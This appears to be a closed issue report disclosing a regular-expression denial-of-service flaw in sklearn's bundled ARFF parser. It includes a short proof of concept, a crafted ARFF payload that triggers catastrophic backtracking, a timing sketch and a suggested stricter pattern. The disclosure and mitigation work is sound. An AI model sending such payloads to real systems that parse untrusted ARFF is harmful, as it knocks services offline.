Closed
Description
Problem description
I found a problematic regex pattern in 'sklearn/externals/_arff.py':
_RE_TYPE_NOMINAL = re.compile(r'^\{\s*((\".*\"|\'.*\'|\S*)\s*,\s*)*(\".*\"|\'.*\'|\S*)\s*\}$', re.UNICODE)
This pattern is vulnerable to ReDoS (regular expression denial of service). Proof of concept:
import re
p = re.compile(r'^\{\s*((\".*\"|\'.*\'|\S*)\s*,\s*)*(\".*\"|\'.*\'|\S*)\s*\}$')
re.findall(p, "{"+"',"*100)
Running the code above keeps CPU utilization at 100% for a very long time.
For more detail about ReDoS, see OWASP.
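To see the growth without hanging the interpreter, the same pattern can be timed on much shorter inputs. This is a minimal sketch: the sizes 4 to 13 and the helper name `time_match` are assumptions chosen for illustration, and absolute timings depend on the machine. The running time should rise steeply with each step, because every comma in the unterminated list is a possible split point for the repeated group.

```python
import re
import time

# Same pattern as in the report above.
PATTERN = re.compile(
    r'^\{\s*((\".*\"|\'.*\'|\S*)\s*,\s*)*(\".*\"|\'.*\'|\S*)\s*\}$'
)


def time_match(n):
    """Return (match, seconds) for an unterminated list of n "'," pairs.

    Hypothetical helper, not part of sklearn or liac-arff.
    """
    payload = "{" + "'," * n
    start = time.perf_counter()
    match = PATTERN.match(payload)
    return match, time.perf_counter() - start


# Sizes are kept small on purpose; n=100 as in the report does not finish
# in any reasonable time.
results = [(n, *time_match(n)) for n in (4, 7, 10, 13)]
for n, match, seconds in results:
    print(f"n={n:2d}  matched={match is not None}  {seconds:.5f}s")
```

None of these inputs match, so all the time is spent on backtracking before the engine gives up.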
Effect of this security problem
Some APIs use this pattern, so untrusted ARFF input can trigger it, for example:
from sklearn.externals._arff import ArffDecoder
content = """
@relation foo
@attribute width {',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',
@attribute height {',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',',
@attribute color {red,green,blue,yellow,black}
@data
5.0,3.25,blue
4.5,3.75,green
3.0,4.00,red
"""
ArffDecoder().decode(s=content)
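One possible direction for a mitigation, sketched here under assumptions and not taken from the project, is to make the three value alternatives mutually exclusive so that each position in the input can be consumed in only one way. The name `SAFE_NOMINAL` and the exact character classes are hypothetical. This pattern is stricter than the original (no quote characters inside quoted values, no commas or braces in unquoted values), so it is not a drop-in replacement.

```python
import re

# Hypothetical stricter value syntax: a double-quoted string, a single-quoted
# string, or an unquoted run without whitespace, commas, braces, or quotes.
# The alternatives cannot start with the same character, which removes the
# overlapping ways of splitting the list.
_VALUE = r'''(?:"[^"]*"|'[^']*'|[^\s,{}"']*)'''
SAFE_NOMINAL = re.compile(
    r'^\{\s*(?:' + _VALUE + r'\s*,\s*)*' + _VALUE + r'\s*\}$'
)

# Well-formed nominal lists still match.
ok_plain = SAFE_NOMINAL.match("{red,green,blue,yellow,black}")
ok_quoted = SAFE_NOMINAL.match("""{'a b', "c,d", e}""")

# The input from the report is rejected without the long backtracking run.
attack = SAFE_NOMINAL.match("{" + "'," * 100)

print(ok_plain is not None, ok_quoted is not None, attack is None)
```

Whether the stricter value syntax is acceptable depends on which ARFF files need to be supported, so this is only a starting point for discussion.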